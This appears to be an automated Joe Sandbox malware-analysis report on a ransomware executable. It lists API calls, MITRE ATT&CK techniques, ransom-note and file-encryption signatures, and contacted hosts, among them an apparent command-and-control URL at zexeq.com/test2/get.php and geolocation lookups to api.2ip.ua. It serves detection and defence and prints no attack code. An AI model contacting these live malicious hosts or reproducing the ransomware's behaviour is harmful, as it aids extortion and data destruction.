              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,4_2_00E67F83
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00E67F00
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00492283 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00492283
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00479F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0048FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0048FE47
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00479F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              Valid Accounts3
              Native API              		1
              Registry Run Keys / Startup Folder              		11
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		OS Credential Dumping2
              System Time Discovery              		1
              Taint Shared Content              		11
              Archive Collected Data              		Exfiltration Over Other Network Medium2
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization2
              Data Encrypted for Impact              		Acquire InfrastructureGather Victim Identity Information
              Default Accounts3
              Command and Scripting Interpreter              		1
              Services File Permissions Weakness              		1
              Registry Run Keys / Startup Folder              		2
              Obfuscated Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol1
              Screen Capture              		Exfiltration Over Bluetooth21
              Encrypted Channel              		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain AccountsAtLogon Script (Windows)1
              Services File Permissions Weakness              		1
              Masquerading              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol              		Data Encrypted for ImpactDNS ServerEmail Addresses
              Local AccountsCronLogin HookLogin Hook21
              Virtualization/Sandbox Evasion              		NTDS24
              System Information Discovery              		Distributed Component Object ModelInput CaptureTraffic Duplication13
              Application Layer Protocol              		Data DestructionVirtual Private ServerEmployee Names
              Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Process Injection              		LSA Secrets1
              Query Registry              		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
              Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Services File Permissions Weakness              		Cached Domain Credentials51
              Security Software Discovery              		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
              External Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
              Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
              Process Discovery              		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
              Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
              Supply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1375050 Sample: 3485f3cbe491a8770a5f05f4cfc... Startdate: 16/01/2024 Architecture: WINDOWS Score: 100 39 zexeq.com 2->39 41 api.2ip.ua 2->41 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 7 other signatures 2->53 7 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe 1 17 2->7         started        12 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe 16 2->12         started        14 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe 13 2->14         started        16 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe 2->16         started        signatures3 process4 dnsIp5 45 api.2ip.ua 172.67.139.220, 443, 49729, 49730 CLOUDFLARENETUS United States 7->45 33 3485f3cbe491a8770a...0af1c2e_payload.exe, PE32 7->33 dropped 59 Found stalling execution ending in API Sleep call 7->59 61 Writes a notice file (html or txt) to demand a ransom 7->61 63 Writes many files with high entropy 7->63 18 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe 1 16 7->18         started        23 icacls.exe 7->23         started        35 C:\Users\user\_readme.txt, ASCII 12->35 dropped 37 C:\Users\user\Desktop37WTVCDUMOB.pdf, data 12->37 dropped 65 Modifies existing user documents (likely ransomware behavior) 12->65 file6 signatures7 process8 dnsIp9 43 zexeq.com 175.119.10.231, 49732, 49733, 49735 SKB-ASSKBroadbandCoLtdKR Korea Republic of 18->43 25 C:\Users\user\...\wctF86A.tmp.ppvw (copy), MS-DOS 18->25 dropped 27 C:\Users\user\...\wctF411.tmp.ppvw (copy), data 18->27 dropped 29 C:\Users\user\...\wctEA40.tmp.ppvw (copy), data 18->29 dropped 31 42 other files (39 malicious) 18->31 dropped 55 Infects executable files (exe, dll, sys, html) 18->55 57 Modifies existing user documents (likely ransomware behavior) 18->57 file10 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe100%AviraHEUR/AGEN.1319085
              3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.wikipedia.com/0%URL Reputationsafe
              https://we.tl/t-eyUsqpKb0%Avira URL Cloudsafe
              http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
              https://we.tl/t-eyUsqpKb0so0%Avira URL Cloudsafe
              https://we.tl/t-eyUsqpKbFl0%Avira URL Cloudsafe
              http://zexeq.com/test2/get.php?pid=F8AFCDC4E100%Avira URL Cloudmalware
              https://we.tl/t-eyUsqpKbt0%Avira URL Cloudsafe
              http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637100%Avira URL Cloudmalware
              http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true100%Avira URL Cloudmalware
              http://zexeq.com/test2/get.php100%Avira URL Cloudmalware
              http://zexeq.com/test2/get.phpp100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              api.2ip.ua
              		172.67.139.220
              		truefalse
                		high
                zexeq.com
                		175.119.10.231
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truetrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637true
                  • Avira URL Cloud: malware
                  		unknown
                  https://api.2ip.ua/geo.jsonfalse
                    		high
                    http://zexeq.com/test2/get.phptrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.nytimes.com/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952433523.0000000003770000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://assets.activity.windows.com/v1/assets3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://api.2ip.ua/geo.jsonX3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://api.2ip.ua/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1676063255.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000849000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://api.2ip.ua/geo.jsonT3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840014089.00000000016D9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://we.tl/t-eyUsqpKbt3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385857595.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.2ip.ua/geo.jsonP3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://api.2ip.ua/geo.jsonR3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.amazon.com/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952218391.0000000004040000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.2ip.ua/M3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).30264859306.ttf.2.dr, 37262344671.ttf.2.drfalse
                                        		high
                                        http://www.twitter.com/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952507557.0000000003770000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.2ip.ua/geo.json2X3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.openssl.org/support/faq.html3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exefalse
                                              		high
                                              https://we.tl/t-eyUsqpKb3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385857595.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://zexeq.com/test2/get.php?pid=F8AFCDC4E3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001379000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exefalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://zexeq.com/test2/get.phpp3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://api.2ip.ua/geo.json83485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.2ip.ua/geo.json8.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.0000000000886000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.youtube.com/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952594991.0000000003770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.2ip.ua/cWc3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.2ip.ua/geo.jsonp3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840014089.00000000016D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.2ip.ua/geo.jsons3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.2ip.ua/geo.json23485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.wikipedia.com/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952579662.0000000004040000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://assets.activity.windows.com3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://we.tl/t-eyUsqpKbFl3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.000000000139A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.live.com/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952417137.0000000004040000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.2ip.ua/o3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1676063255.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.2ip.ua/geo.jsonE3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000849000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.reddit.com/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952491269.0000000004040000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://activity.windows.com3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.2ip.ua/s3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.2ip.ua/83485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://we.tl/t-eyUsqpKb0so3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://api.2ip.ua/MW3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://assets.activity.windows.com/v1/assets/$batch3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.google.com/3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952353931.0000000003770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  172.67.139.220
                                                                                  		api.2ip.uaUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  175.119.10.231
                                                                                  		zexeq.comKorea Republic of
                                                                                  		9318SKB-ASSKBroadbandCoLtdKRtrue

                                                                                  General Information

                                                                                  Joe Sandbox version:38.0.0 Ammolite
                                                                                  Analysis ID:1375050
                                                                                  Start date and time:2024-01-16 00:40:08 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 9m 14s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
